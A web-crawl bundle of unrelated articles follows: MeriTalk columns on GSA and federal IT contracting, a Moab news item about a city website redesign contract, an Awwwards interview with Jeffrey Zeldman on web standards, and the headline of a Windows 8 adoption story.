(OSDBU) installations, and similar topics. More hearings are on the calendar. The topics covered and the level of interest shown, should be indications to SBA officials that Congress is expecting the agency to ensure “care after the contract” for small firms. Congress and the SBA may want to consider re-naming the existing OSDBU to the Office of Small and Disadvantaged Business Success. While this may seem to be a small change, it underscores the real mission the SBA should be focused on. What better place to start than inside its own doors?
Will GSA Survive Its Own Sustainability Initiative?
Tags: Desktops, Laptops, Printers, Green IT, Services
GSA Administrator Martha Johnson announced July 20th that her agency’s IT Multiple Award Schedule will offer only products that comply with either ENERGY STAR or the government’s own Electronic Product Environmental Assessment Tool (EPEAT). It will be interesting to watch whether the greater impact of this move falls upon GSA or its contractors.Johnson’s announcement came as no surprise to anyone who has heard her speak over the past two years. Dozens of companies, in fact, have already moved toward offering ENERGY STAR-only IT products or similar “green” solutions. While GSA will have to use some common sense in circumstances where there is no identifiable “green” benchmark, I am not sure that Johnson’s announcement will cause a tidal wave of anxiety from contractors.The impact on GSA, however, may be more substantial. The IT Schedule is not currently operating at peak efficiency. It is lethargic and its total sales have stagnated for the past several years. While annual sales are on track to reach almost $17 billion this fiscal year, the IT Schedule has been losing market share to contracts like NASA SEWP, specific agency MACs, and even GSA’s own Alliant contract. The IT Schedule team does not move at the speed of customer need these days. Adding a new stumbling block to a contract method already hobbled may not be the best prescription for IT Schedule health.Why does this matter to GSA? The Industrial Funding Fee generated by IT Schedule sales pays not just for that program, but subsidizes a substantial part of the agency’s staff offices, such as the chief acquisition officer, chief information officer, general counsel, and others. Adding a new requirement to your IT program in a market filled with options that are already more nimble may impact operations throughout your agency.The Federal IT market is full of contracting options. There are hundreds, if not thousands, of IT acquisition vehicles. These are vehicles that offer solutions to customers across the full spectrum of potential needs. If some government buyer has a legitimate need for IT equipment that isn’t ENERGY STAR compliant, they will still get what they want, but it won’t be from the GSA Schedule. I have never been a big fan of limiting customer choice via contracting. Presuming that you know what is best for your customer and will offer only those solutions, is an approach that has a long track record of failure in the government market. Customers vote with their purchase cards and buy as they see fit, not from an agency that makes them eat their vegetables.None of this even begins to touch on Johnson’s similar announcement that contractors will be required to step up their “take back” capabilities as well. That is an added cost to contractors that will make the IT Schedule even less attractive. So, contractors and Federal buyers will continue to do business in the Federal IT market. Will GSA, however, become simply so over-burdened with unique requirements and costs that it offers the best sustainable program that no one will buy? Stay tuned
Protesting the Extension of Protest Authority? Better have a Good Argument
Tags: Collaboration, Project Management, Workforce
There is surprise and uncertainty going through the Federal contracting community currently on the Government Accountability Office’s (GAO) decision to continue hearing task and delivery order protests on transactions over $10 million. Many hoped that Congress’ inability to pass legislation extending the authority originally granted in the Defense Authorization Act of 2008 would result in a year-end buying season with reduced protest risk. The statutory authority to hear such protests provided in the Act expired May 27th. Not so fast, said GAO on June 14th. The agency apparently found for itself a continued ability to hear such protests, most likely based on precedent, statutory, and regulatory bases. Defense Information Systems Agency challenged the authority of GAO to hear a protest brought by the Technatomy Corporation, claiming that the ability to do so had sun-setted. While GAO said, “We conclude that we have jurisdiction to hear the protest, and deny the request for dismissal,” they also said they would withhold their specific reasoning until a separate decision, apparently on this protest, is rendered. Many contractors have long fought against giving GAO the right to hear task and delivery order protests. The original recommendation to do so came from the Services Reform Act (SARA) Panel that, despite a litany of objections from industry, included the recommendation in its final report. Later, when legislation was being considered in Congress, a number of industry groups and individuals pushed hard against it. The basic arguments were that protests are expensive, time consuming, and that the costs are ultimately passed along to the government. Neither the SARA Panel, nor Congress, was swayed by the arguments. In fact, I have had more than one former SARA panelist tell me that the basic message from industry was heard as “protests take contracts away from my company and given them to someone else.” All of the opposing arguments came across as why the creation of the new protest authority was bad for industry, and not why it would harm the government. Such perceptions do not form a good foundation for a case against protests. This is especially true when the provision being discussed covered only non-General Services Administration (GSA) Schedule task and delivery orders. Those orders were, and are, subject to protests under separate rulings made by GAO in various cases. It is doubly difficult to argue that one type of indefinite delivery/indefinite quantity (IDIQ) contract should not have protest capabilities when another one does. Nevertheless, contractors still plan to push Congress to specifically rescind task and delivery order protest authority. That’s fine, and it’s what our democratic process is all about. To be successful, however, they will need better ammunition than what’s been used so far. Here are a few recommendations to consider:· Frame all arguments in terms of what’s best for the government. Few in Congress are out to do favors for contractors these days· Show how the government will be protected by not having an oversight tool it has today· Discuss how eliminating protest rights will promote transparency· Explain why having protest rights for Schedule purchases is ok, but not for other IDIQsThese are just some of the arguments that those seeking to end task and delivery order protest authority will have to face and for which they will have to have good answers. Congressional officials may have their own ideas, and there are other issues before Congress that contractors may want to consider as higher priorities.Whatever the outcome, it is clear that protesting protests is not an easy task. Take Care of Your Regular Joes if You Want to Build Your Business
Tags: Collaboration, e-Procurement, Project Management, Services, Workforce
Joe is a regular at the Federal IT Bar and Grill. He comes in after work each day for a glass of milk and good discussion. Like most regulars, Joe understands he occasionally has to wait for his order if it’s a busy night. He’s loyal to the Federal IT Bar and Grill and, after all, it’s right across the street from his office. So long as there’s a basic understanding that Joe will get his milk and discussion when he needs it, he’s okay with sometimes not being the first person served.And so it is with loyal customers in our regular Federal IT world. They’re loyal to their contracting program, even if it doesn’t “wow” them every minute of the day. In this case, let’s say the program is the GSA IT Schedule. A venerable, popular contract that consistently generates more IT business than all government Governmentwide Acquisition Contracts (GWACs) combined. That certainly shows some level of loyalty and popularity.What happens, though, when the Federal IT Bar and Grill loses its experienced servers? It now has a lot of people in the back, watching over every server's move. Only a few people know Joe, let alone that he’s been coming to the place for years. Suddenly, not only is Joe not getting his milk on time, it may be last week’s milk! On top of that, the good conversation that made him feel at home has been cut down and replaced by Neil Sedaka records (apologies to Neil Sedaka fans). Now, Joe does not feel he recognizes the place, and he certainly does not feel appreciated. Next week, Joe plans on trying out the new GWAC Cyber Café down on McClure Street.This is, in essence, what’s happening with the GSA IT Schedule. After a few years of musical chairs in top positions and persistent problems keeping contracts updated with the latest offerings, IT Schedule managers have gotten caught up in a series of internal hurdles and processes; all of which have made the IT Schedule more difficult to manage and taken them away from a focus on customer service. Federal IT customers are voting with their pocketbooks and taking their business to other contract methods. Schedule sales have stayed relatively flat for several years, while sales through individual agency Multi-Agency Contracts (MACs) have increased. Like the management of the Federal IT Bar and Grill, GSA’s IT Schedule team needs to focus on what’s important. Job number one: Make sure your contracts have the very latest solutions at fair prices. Too often today, the IT Schedule is among the last vehicle to have new offerings. If your competitors have it first, your customers will go there. Job number two: Tell your story. GSA has a good one to tell. Fairly negotiated prices, offerings that meet all Federal rules, and do-it-yourself help when you need it, all for only .75% (yes, it’s still important that customers know it’s not 15%). Thankfully, the IT Schedule has a new business manager. She should hammer home this story as often as it takes. She should also have the support of senior leaders who understand that they run the IT business, and run one in a very competitive market. The IT Schedule can win back Joe, but it will have to focus on him and meet his needs. Having too many hurdles and internal traps may result in the cleanest bar and grill in town, but does not guarantee you any business. Look Beyond Today to Find Success Over Time
Tags: Collaboration, Networking, Project Management, Workforce
It is difficult, and scary, these days to look up from what is right in front of us at the larger environment. Recent headlines have screamed, “Government Shutdown Looms,” “Contractors Expect Slow Quarter,” and “Administration Lauds Reduced Contract Spending.” It takes courage to keep your head up in this environment. Many companies do not. Heads are down and focused only on the immediate. And yet, we know that to be consistently successful, your company has to keep its head up. You have to have someone, preferably a team of them, looking constantly at what’s happening from side to side and over the horizon. Without that function your company can get caught flat-footed and become the corporate punch line of the old joke, “I was wondering why the ball was coming toward me so fast, and then it hit me.” Simply put, there is no benefit to receiving a corporate black eye because everyone in your business is looking only at the straight ahead near-term. Now, such people certainly do have a place in your business. There is no way your firm can successfully close opportunities or keep its cash flow positive without professionals who have a laser focus on capturing near-term opportunities. I have run two small businesses. I get the need to ramp up business quickly and get money in the door. This is not, however, the problem I see with most companies today. It’s the ability to look out beyond the current quarter or fiscal year to strategically plan. Fewer and fewer companies will make investments that do not promise immediate results. While these companies may turn a profit today, their long-term prospects are far less certain.What happens to these companies down the road? I would argue that the pipeline dries up pretty quickly and new business becomes increasingly difficult to get. For example, the Federal market trend in commercial IT and services is toward indefinite delivery/indefinite quantity contracts. If your firm was not looking at important opportunities at the time these contracts were formed, you may find yourselves shut out of business you thought would be yours.Also, the services or products you offer may no longer be relevant to what’s happening to your future government customer. Only someone with their head up and looking around can see new developments in services and changes to government organizations that give your firm the time and ability to keep pace. You do not want to sell WordStar in a world where word-processing is now brought in the cloud.Long-term market intelligence and a broader participation in Federal market events and/or organizations costs money. It’s also current money that cannot always show a pay-off by the end of the quarter. I get it. No one has infinite resources to spread around. Not dedicating any resources to the future, however, many put the future of your company in doubt. Smart, wise investments in the future are expenses that no serious government contractor should go without. Don’t be the company that gets smacked in the head with a ball from the outfield and is knocked out. Focusing on Sustainability, GSA Risks Sustaining Its Future
Tags: Collaboration, e-Procurement, Green IT, Networking, Portfolio Management, Project Management, Services, Workforce
I think sustainability is a wonderful thing. Being responsible stewards of the resources we've been given is very important. In fact, it is my experience that industry and government have so far been working pretty closely together to "green" all parts of the acquisition process, something that I had earlier thought would be a bone of major contention. So far, so good. We now have everyone cheering "go green." No one should think that I am in favor of oil spills, Three Mile Island, or Love Canal disasters.I am, however, in favor of the "S" in "GSA" still standing for "services" and not "sustainability." GSA has a mission to fulfill. It is to serve the acquisition needs of its government customers. GSA is, at its very core, a service business. If it's not providing the solutions its customers need, it's not fulfilling its mission or generating the income it needs to continue operations.Right now it seems that GSA is only about sustainability. Other important operations are taking a back seat — if they can even make it into the hybrid car. Staying on this course, dare I say it, is "unsustainable." Here's why:GSA is losing its edge in being a leading provider of IT and service solutions: Focusing only on sustainability means that GSA’s biggest contract vehicles are losing their competitiveness. The growth in the Federal IDIQ sector is almost entirely in other government agencies. The proliferation of single agency Multiple Award Contracts (MACs) is taking away business and opportunity from GSA's contract vehicles. Exhibit one is the IT schedule where sales have been flat for several years. One-time GSA customers are voting with their wallets and using their own MACs. While GSA's Alliant contract is getting decent business, how much better could it be, though, if it had top-level attention and promotion? One item for GSA leadership to examine: how to test cost-type contracting on vehicles like GSA schedule contracts. If your biggest program doesn't offer it, and your biggest client, DOD, wants it you'd better find out a way to get it to them if you want to keep their business.GSA can't add innovative solutions to its contracts fast enough: Another issue that needs top level attention at GSA is the process by which new products and services are added to existing contracts. It used to be that if a new item was introduced in the commercial market one day, it could be added to schedule that same day. Anecdotal evidence now indicates that at least some COs are asking for a full year of commercial sales before they will consider allowing an item onto a schedule contract. By then it's no longer new — and it can most likely be found on a half dozen other government contracts.GSA is more than the Public Building Service (PBS): Scan the GSA Web site and you will find that the overwhelming majority of discussions have to do with the Public Buildings Service. Indeed, PBS is an important part of what GSA does. Still, PBS is only part of the agency. If it's getting most of the press and the attention, it doesn't take long for the other parts to atrophy. GSA’s senior leaders need to show the Federal Acquisition Service the necessary attention and dedicate resources to it at the top level to make sure there is no atrophy. All of this adds up to a GSA that is headed toward trouble if the single sustainability track remains in place. If your offerings are no longer relevant to your customer, there is no reason for them to come to you, no matter how sustainable they may be. The agency will no longer be able to support itself through solution-generated revenues. Congressional appropriations are highly unlikely.It is time to place the sustainability initiative in its proper perspective: an important, but not all-consuming, goal for GSA. Let’s hope that the agency can address its other needs and remain not just sustainable, but essential, for years to come. Industry-Gov Communication Forecast? Depends What End of Penn Ave You're Taking the Temp From
Tags: Services, Workforce
It is a simple fact that communication is the key to successful relationships of any kind. This includes the business of government contracting. It is also a fact that people in authority can exercise great power with their communication. With this power, though, must come responsibility and an awareness of how big of an impact their communication can have.These two facts intersected twice in early February in the field of government contracting. One example could have a tremendously positive impact on the business of government. The other could all but cancel the first one out.In issuing a memo to all government contracting offices promoting government-industry communication, Office of Federal Procurement Policy Administrator, Dan Gordon, used his position to target head-on a once old problem that has recently reared its head again: a view that government contractors are the enemy and that communication with them should be limited. By promoting better and more frequent discussions, Gordon understands that it is vital to the successful conduct of government business for contracting officers to interact with industry. Only through open, proper discussions can an overburdened workforce properly position their procurements in order to drive the best government outcomes. Mistakes are identified earlier, requirements are more accurately defined, and a true understanding of what the “state of the market” is for a particular need is obtained. At the same time Gordon was issuing his memo, however, Senator Claire McCaskill (D-MO) chose to use her substantial procurement oversight bully pulpit to undermine confidence in the acquisition workforce and encourage minimal communication between that workforce and the contractors they must work with in order to meet the many missions of government. Specifically, McCaskill chose a hearing on government audit practices to issue a statement that many government contracting officers have gotten “too close” to contractors to make good judgments. The former state auditor apparently believes that contractors can hold a Svengali-like sway over government buyers if they communicate too much. Perhaps unsurprisingly, the Senator advocated for auditors to have the last real say in what constitutes a good contract price because they are detached from day-to-day contractor interactions.Wow. In one hearing Senator McCaskill managed to both actively discourage the sort of discussions that Administrator Gordon advocated for in the same week and insult the integrity of what is largely a professional, responsible acquisition workforce. Where Gordon sought to thaw government-industry suspicion, McCaskill took it right back to the freezer.While the Senator is certainly entitled to her point of view, she perhaps could benefit from a bit of restraint and more carefully chosen words. She is no longer a Senate back-bencher, but the chair of two key Senate subcommittees with some form of government contracting oversight. Her words and positions carry considerably more weight and can have a profoundly chilling impact on what should be routine government-industry communication. With the pulpit that she has obtained comes the responsibility to communicate wisely from it. It is probable that the Senator wanted to send one message, it is equally as likely, however, that the workforce heard another. Without more careful use of her position she could easily find herself holding oversight hearings next year on why the government cannot conduct well-defined or timely procurements.Communication is a powerful thing. Communicators should use that power wisely and well.
Copyright 2015 MeriTalk
About Us | Contact Us | Privacy Policy | Terms of Use | Incorrect please try again
Enter the words to the left: | 计算机 |
2015-48/3679/en_head.json.gz/389 | Moab city approves contract for website redesign
Jan 24, 2013 | 1020 views | 0 | 6 | | The website for the city of Moab will be redesigned and upgraded this year. The Moab City Council voted Tuesday, Jan. 22, to approve a three-year contract with CivicPlus, a company that specializes in designing websites for government entities. CivicPlus, a Kansas-based company, was chosen by a committee made up of city staff members. The company was chosen based on the fact that it was “the most responsive, offered the most experience and [was] reasonably priced,” according to a memo given to the city council by the committee. Under the terms of the contract, CivicPlus will redesign the website to improve functionality and online navigation. CivicPlus will also provide all necessary training for city staff who will serve as system administrators. According to CivicPlus’s website, the company has been specializing in “city and county e-government communication system[s]” since 2001. The three-year contract will cost the city $10,627 per year. That price initially seemed high to some council members, according to Tuesday’s discussion. “I was taken aback by sticker shock,” council member Gregg Stucki said. “But seeing the other bids, I realized that it’s not out of line.” The city had the option of a slightly cheaper contract which would have required a payment of $23,998 up front. However, Rachel Stenta, assistant city manager, explained that paying the yearly fee would allow the city of the option of having another website redesign done at the end of the three-year period. “The option we would be going with is the three payments,” Stucki said. “There are some advantages to that, even though it works out to being a little bit more.” Council member Kirstin Peterson said the website changes will be useful for city residents and employees. “I sat in on the meeting with this company,” Peterson said. “It’s very comprehensive. I think it will be taking the city website a huge step forward to really serving our community, and being a great tool for all the departments to work with.” Stenta said that the next step will be to develop a project schedule for the redesign, but city officials are hoping to have it done by the end of the fiscal year. “Hopefully we can launch in July,” she said.
Moab needs better air service...
County opts to back Boutique Air for EAS contract
Voters choose Derasary, Jones and Knuteson-Boyd for Moab City Council
Lisa J. ChurchStaff Writer
County tax bills redesigned to make them easier to read, understand
City Works From the desk of Moab City Manager Rebecca Davidson
Rebecca Davidson | 计算机 |
2015-48/3679/en_head.json.gz/746 | Design & Illustration Media News Resources & Tools The Best Articles Web Design Inspirational talks Interviews (*) Popular
Agencies & Studios Animation Apps & Web Apps Art & Design Business & Productivity Case Study Code & Front-End Coding Techniques Creative Advertising Events & Conferences Fonts Gadgets Giveaways HTML5 & CSS3 Icons Illustration Inspiration Interviews JavaScript Layout Design Learning Resources Motion Graphics Packaging & Graphic Photography Plugins & Frameworks Responsive Sites of the Month Sites of the Year Tutorials Typography (*) Popular
Recognition and prestige for Web Designers and Agencies
Interview with "A List Apart" Founder Jeffrey Zeldman
By awwwards-team
Jeffry Zeldman is a key supporter of Web Standards
Jeffrey Zeldman is certainly one of the world's most renowned personalities in Web. Guru of Web standards Zeldman is also an entrepreneur, web designer, author, podcaster and acclaimed speaker.
He has been blogging independent web content since 1995. He was one of the first pioneers of Web Standards, and is creator and editor-in-chief of A List Apart and founder of web design studio Happy Cog.
We were with him at the Future of Web Apps event that took place in London in October. www.zeldman.com | Twitter: @zeldman
We chatted to Jeffrey in London
Awwwards Team: You’ve been involved in a lot of projects since 1995. The Web Standards Project, Happy Cog, A List Apart...How do you find the time?
Well, the Web Standards Project I’m not involved with anymore. It’s a pretty quiet thing now. Some friends and I started it in the ’90s, Steve Champeon, Jeff Veen, Dori Smith, Tim Bray...
When we started nobody cared about web standards. We made up the word, because there were no web standards, there were just some W3C recommendations that nobody paid attention to and there were four versions of scripting languages. One was Javascript. And so all that stuff has been taken care of. There’s a new group called Future Friendly that’s sort of picking up the ball and saying “Okay, now for the next generation of devices, how do we approach this again?”
There could be a new Web Standards Project tomorrow, say for TVs, I think. Phones tend to have Webkit or Opera browsers, or Chrome browsers, and it’s good, so though I’m simplifying, that’s not too much of a problem. But TVs have browsers now and people are going to want to navigate using a TV remote,and a TV browser isn’t necessarily a fully-fledged Webkit or Mozilla or Opera or IE browser, so you really don’t know what you’re getting. I think there’s always work to be done.
Then there’s A List Apart. We’re in the middle of a redesign, it’s launching at the beginning of the new year. It will continue in the vein that we started, but it will have more features. I started the magazine in 1998 and every 2 weeks a new issue would come out and usually there were 2 articles in the issue and that was the whole thing. It was always a magazine. I thought of it like a magazine, I ran it like a magazine and so it’s not a blog and it’s not constantly putting out content.
Our focus will continue to be very well-vetted, carefully-edited, carefully-researched articles that try to advance the craft of web design, focusing on content strategy or responsive design or some other aspect of the craft. But we’re going to have columns- we have some really brilliant people lined up as columnists- and we’re going to have a blog. We’re launching with those two additional content features just to get people used to the idea that there’s more frequent content. We don’t want to introduce everything new at once because we would lose our focus and also it would take a huge staff and we don’t have that. We’re going to roll out new features a bit at a time and see how our community responds, but we have a lot of other secret, wonderful features coming.
The design is already beautiful and the new design is really beautiful, impactful and very magazine-like. Jason Santamaria did the last design and it had sort of a literary quality. He was trying to evoke the feeling that this was a library for web designers and he did it very skilfully, and now Mike Pick and Tim Murtaugh are redesigning and it's going back to the magazine idea, a modern magazine like Esquire (which is actually an old magazine but always has modern art direction). I think it'll be very interesting to see how the community responds.
We have an editorial staff and we're constantly reviewing submissions. There's a lot of stuff we send to other publications because it's good, but it's not quite right for us, or sometimes things feel like a rehash, like they're not really new. We have a very high bar. That's why we don't publish all the time, because we're really trying to advance the craft of web design and digital experience design generally and that means that we have to say no to a lot of content that gets submitted to us. There's a good place for that content but we're just not it.
Even though we have a wonderful acquisitions editor, a wonderful editor-in-chief, and a whole team of technical editors, I still write the blurbs when the issue is about to go live. I've always done that and it wouldn't somehow feel like A List Apart if I stopped. If I ever stop doing that I'm sure it'll be great, and I'm sure other writers would pick up where I left off, but there's just something about doing it that feels right to me.
Happy Cog. Our editorial headquarters are in New York which is where I am, and we have client services headquarters in Austin and Philadelphia. They do wonderful work so I'm able to delegate a lot of that work. I don't have to be hands on and I can focus on the editorial side. I meet the clients and I know what's going on and it's wonderful, but I don't have to supervise the projects. I stopped doing client projects only about a year ago.
A Book Apart
Do you mind not doing them?
It's mixed. Is feels like a relief in some ways, after 20 years of doing client services. To not necessarily have to call a client on a given day is kind of a nice thing in a way. I love clients, I fall in love with our clients. I always have good relationships with them. We pick our clients carefully, so I miss it too. And then delegating is a strange thing because on the one hand, you trust the people that you've hired and they're really good, they really know their job. But at the same time you're not doing it, so there's a sense of loss and fear of "Is it still Happy Cog if I'm not doing everything?"
The self-aggrandizing fantasy I have about it is it's like Walt Disney. When he started he animated every frame, he did all the animation and all the drawing at first, and eventually he did none of it. So there's some kind of arc there, I'm somewhere on that arc. I'm definitely not Walt Disney, but that's how I'm able to feel comfortable with it. This is a natural evolution and this is what I'm supposed to be doing. I love the editorial stuff. I think I'll do more client services again, but right now it's just nice to have a break and focus on the magazine and the books and the conference. Jason Santamaria, Mandy Brown and I founded A Book Apart, and we have new books every few months. Mandy is the editor, so I'm involved in acquisition and content but I don't actually have to do the hard, in-depth manual work of reading each draft and revising the work with the author (though we have great authors so not much revision is needed). So that's how I'm able to do all these different things. The conference has a great staff, An Event Apart, and we have 8 shows a year now.
An Event Apart
Who's in charge of looking for talent and trends and content for an Event Apart, and how do you go about it?
My partner Eric Meyer and I do that. I see what people are talking about on our stage, I see what we're doing at Happy Cog and what my friends are doing at their studios and it's kind of easy to see. You run up against a problem like "What do we do about responsive images?", you read other people's blogs to find out what they're saying about it, you find the smartest people talking about the stuff, some of them I work with, some of them I speak with at An Event Apart or at other conferences.
We're always looking for people who have made a difference in the industry. Luke Wroblewksi with mobile, Ethan Marcotte with responsive, Karen McGrane with adaptive content and Kristina Halvorson with content strategy. These are people who've made a huge difference and are great speakers. That's really important because some people are gifted writers, but on stage they freeze up, they're not natural, they're not funny. We're constantly looking for new people to bring along because we don't eventually want to be a bunch of 70-year-olds: "You saw them for the last 10 years, come see them again!". We're not just going to keep bringing the same stuff out every year.
We structure the days like playlists and we'll start with someone really strong on a particular topic and then we'll make sure the next speaker has a related topic but a slightly different angle on it. Maybe the middle speaker is less experienced, so we'll sandwich them between two really strong speakers. They may turn out to be the hit of the show. I really think of it like music, like making an ideal playlist. It's not just how great is that song, but how great is that song after this other song? We try to make sure there's an educational narrative running through the two-day conference and we really try to take a holistic approach. Are you going to get a pretty strong overview of the most important issues that we're all wrestling with right now? What do I do about mobile? What do I do about content? How do I not design the whole website and then beg for the content the day it's due? How do I deal with all these new devices? How do I avoid all these traps and problems?
I used to make a joke that there are 500 standard breakpoints in Android. Android is like Windows in a way, like Windows used to be. Apple was always "We make an operating system for our own computers, and here are the three models of our computer this year, and buy one of those because that's what you've got to choose from". Windows was always, "Hey, we don't care if you've got a really new computer or an old one", and by being compatible with all those different devices they offered a different experience. Windows meant you could basically have $5 and still have a PC, and that was wonderfully democratic but because they didn't know the capabilities of each screen and everything else, it was a complicated operating system, and buggy, and you might not have a great experience. And I think that's true with Android too. Android is along that line. The phone has all kinds of capabilities and features, depending who manufactures it.
Originally when the iPhone came out it really excited people in mobile. "Now I can really design a good thing for mobile". But they were like, “Well, now I can design for this screen.” But when Android came out they were like "Oh, there's too many screen sizes, now what will I do?". Responsive is one answer to that, and there are other answers as well, but the idea that you can just design for one screen size is gone, I think.
Responsive is one answer to that, and there are other answers as well, but the idea that you can just design for one screen size is gone, I think.
Is everything you do at Happy Cog now responsive, or are there still projects that aren't?
I would have to say just about everything is. I did a fixed-width responsive design for my site, which doesn't make sense, except it does, it works. I have a hard time myself because I think we're doing some really gorgeous stuff now with responsive, but it's a challenge. If you buy into the hallucination that we have some control over the canvas, and you set up a fixed-width, it is easier to do a design that feels controlled and very elegant, very finished. Just like if you're designing for a particular screen size you could go, "I'm going to fill this part of the screen with this". We like that, we like our canvases. It's harder thinking outside the canvas. I think there's an explosion of new ideas in design, but then some responsive designs are absolutely gorgeous.
Our collegue Martha caught up with him.
When clients come to Happy Cog, to what extent do you have to evangelize to them about content-first and accessibility and web standards?
The beauty of it is, most of the clients who come to us come to us because of our reputation and they often come having read A List Apart, and maybe reading A Book Apart books. So when they come to Happy Cog, we don't generally have to sell them a content strategy, they come wanting it. We don't have to sell them on web standards, they know that we do that. That's why they're coming.
I think, this is a generalization, but people in the same field tend to hire us. In other words, someone who read “Designing with Web Standards” and worked as a designer, and is now maybe a content director at a company, brings us in. Their boss may bring in another studio that's more corporate, bigger, better-known in the corporate world, and so then we sort of compete for the job, but if we're hired the people who hire us want what we have. That's the marketing we do. A List Apart started before Happy Cog, so A List Apart is Happy Cog's marketing but we don't do the magazine for that reason. We do the magazine to try to advance the industry but then, because we happen to have a company that does stuff, people who care about the industry will go “Well, let's give these people a shot, they seem to know what they're doing.”
So you tend to get quite ideal clients in a way?
Yes, we tend to get really smart, wonderful clients. No job is ideal, and no client is ideal, we're not ideal. We're all people, so there's always something unexpected that happens. Something needs to get done faster than we agreed, or the portion of the budget we thought we had for research dries up. There's always some kind of negotiation, but we have really good Project Managers too. That makes a huge difference.
When I started Happy Cog it was originally just me freelancing, and I was putting together small teams of freelancers in the beginning and that was cool but we didn't have Project Managers. I was like "I'm a Creative Director and I'm a Project Manager". That doesn't work so well. I mean, it worked well in that we did great projects, and I had nice relationships with the clients and we fought for good work and everything, but I wasn't necessarily going to get up early in the morning and call the client and say "Here's what we're doing today". Clients really like hand-holding, and the more money they're spending the more they need that. And it makes sense. I can't imagine taking $100,000, giving it to someone and waiting three weeks to see if they had something to say to me. Now we have these brilliant Project Managers who are constantly checking in with the clients and making sure everyone's on the same page, everyone knows what's expected that day and everyone knows what we're working on, and if there's a quibble about something that it gets back to the right people, it's addressed. That makes a huge difference, it's one of the most important things. Nobody talks about it.
What made you realize you needed that?
Having done without it, and then hiring people like Dave DeRuchie to do it in Philadelphia and seeing what a difference it makes to have really brilliant people at the top of their game handling that, so that designers can design and coders can code and everyone can relax and do their jobs and not worry about someone being angry because you forgot something.
We've almost never had an unhappy client, but once I had an unhappy relationship with a client. I thought we were speaking the same language and I thought from our contract and everything else that it was clear what we were and weren't delivering, but the client somehow had in his mind that we were responsible for putting all the content on his website. We delivered these templates and style guides and content guides, and we gave him these "For instance" pages, and we had a content strategist and an editorial person on that project, more than design studios did back then. But it got to the point where he was never going to be happy, and he was never going to pay, and we were never going to finish so...not always ideal.
You learn from that, and I learned two things from that. One is I'm glad I incorporated because if I wasn't incorporated and things had gone really wrong I could have lost my apartment, been selling pencils on the street. And the other thing I learned was that I needed a really good Project Manager. I shouldn't assume my clients get it, I shouldn't assume they're so smart, they're so cool, they get it. We're very lucky that usually that's the case. I mean, we work for it too, but we tend to have clients who get what we do and want what we do and understand what we do. But every once in awhile we're not going to have that and so you just need someone who very clearly says "This is what the studio's responsible for, here's what we're doing."
Trends and Future in Web Design
What trends do you see coming in web design?
I think people are getting our content in different ways, they're finding it in different ways and they're using different devices and, for good or evil, web-capable TVs are the next thing. So I think we have to keep on thinking about mobile-first and content-first, I think we have to keep on figuring out what to do with tiny devices that have high-res screens and may have fast bandwidth but may have slow bandwidth. I think there's a lot of stuff to figure out. How do we keep using standards? How do we develop new standards? I think given the wide range of devices and use-cases, one of my favorite imponderable questions is "I have a screen that wants high-res Retina images, but I'm on 3G".
How do we keep using standards? How do we develop new standards? I think HTML5 is key.
What do you send me? And how do you know if I'm on 3G? 50% of the time people are using their mobile in their home or office, where they have fast bandwidth. I don't know, I have no way of knowing what your bandwidth is so what do I send you? Whatever I send you I'm going to make somebody unhappy. Is there some other way to go about it? Can we just carefully choose our images, like, "I'm going to use watercolors where even if it's medium resolution, it still looks cool". Can we blur the background so that there's less bandwidth even if it's high-def? There's lots of stuff to think about, there's lots of new challenges. I think responding to all those new challenges now, when we're moving kind of faster than reason, that's a big challenge now.
And then taking better advantage of mobile. Taking better advantage of geo-location and built-in cameras and all that stuff, whether native or Web App. Taking better advantage of those things.
I think HTML5 is key, because it's so semantic and has new content semantics like "article" and "section". I think it's made for the way we're publishing now and I think we're going to see big changes in how CMSs are designed to accommodate mobile and orbital content and I think we're going to see an end of pages, in a way. We're going to stop focusing so much on pages and start focusing on content chunks, and how we structure them and how we design them for different use-cases, different devices.
Which technologies are you focusing on right now?
Our front-end developers are using Less and Sass now, not just CSS. Less and Sass are CSS preprocessors that can speed up development, so our front-end people are using those. We're studying the problem of Retina images and what to do about that. We're looking into and working in native. But mainly we're using good, structural HTML5.
Who's leading the way into the future?
Luke Wroblewski is pretty brilliant on mobile. We have him speaking a lot at An Event Apart, he's one of our favorite speakers, he's really funny. This is a guy who when I first saw him was talking about web forms, the most boring subject you could possibly pick, and making it fascinating. I saw him at South by South-West five years ago. South by South-West is a festival. There aren't many presentations by individual speakers but he was making one. It can be very crowded. It's a really wonderful festival but it's not necessarily the best environment to hear an individual speaker speak on a technical topic. But Luke had the whole room enthralled and I thought, "This guy can talk about anything, he's amazing". I think he's really smart. He was a lead designer at Yahoo for 10 years, so he's had a lot of experience. I think he's leading the way.
My very humble friend Ethan Marcotte with responsive design, who worked at Happy Cog until recently, absolutely brilliant guy. Jeremy Keith from Brighton and his partners at Clearleft, Richard Rutter, Andy Budd, I think they're really brilliant. Jeremy Keith is a really great thinker. Eric Meyer, my partner. I think Kristina Halvorson has been amazing with content strategy and it changing the whole industry. I think she's done for content what I tried to do for web standards.
I think Karen McGrane, who's talking about adaptive content now, just a really brilliant person. When she was very young she was basically the first information architect, at Razorfish. She trained so many people, she trained Liz Danzico who now runs the School of Visual Arts MFA in Interaction Design program in New York. She trained the people who trained the people who trained the people. Some people get 20 years into the business and they're sort of burned out, but she's still really young because she started young. Karen is really vital and she's leading a whole new way of thinking about content management systems and content distribution. These are some of the people that I think are pointing the way. I'm leaving a lot out and I feel bad, I hope none of them are reading this. We try to publish at A Book Apart the people who we think really have something very important to say.
Well, thanks so much.
A pleasure!
By Awwwards Team
awwwards.com
Awwwards – recognizing the talent and effort of the best web designers, developers and agencies in the world.
We aim to create a meeting point where web professionals from across the globe can come to find inspiration; a space for debate; a place to share knowledge and experience; give and receive constructive and respectful critiques. “Always hungry”.
BLOG Inspiration for web designers and developers
Mattia Cacciatori: The visual web is here, and here to stay.
Meet Cartelle
Free eBook: Interaction Design Best Practices (Words, Visuals, Space)
7 Top mistakes you make while writing CSS for WordPress theme
Trendy Web Color Palettes and Material Design Color Schemes & Tools
Mastering UI Patterns for Smarter Design
UncleGrey and MediaMonks win May's SOTM with Weber - BBQ Cultures!
Free eBook: Principles of UI Design Consistency
Case study: HUGE
Marketing You™
Interview with Julian Shapiro
Top Digital Agencies in California: Interactive Design from the West Coast
Vote now for the Site of the Month for May!
Developing an Effective Strategy for Your Web Project
Free eBook: The Curated Collection of Web Design Techniques (Cards & Minimalism) | 计算机 |
2015-48/3679/en_head.json.gz/946 | Windows 8 Early Adoption is Well Behind Pace Set by Windows 7
Shane McGlaun (Blog) - October 2, 2012 10:18 AM
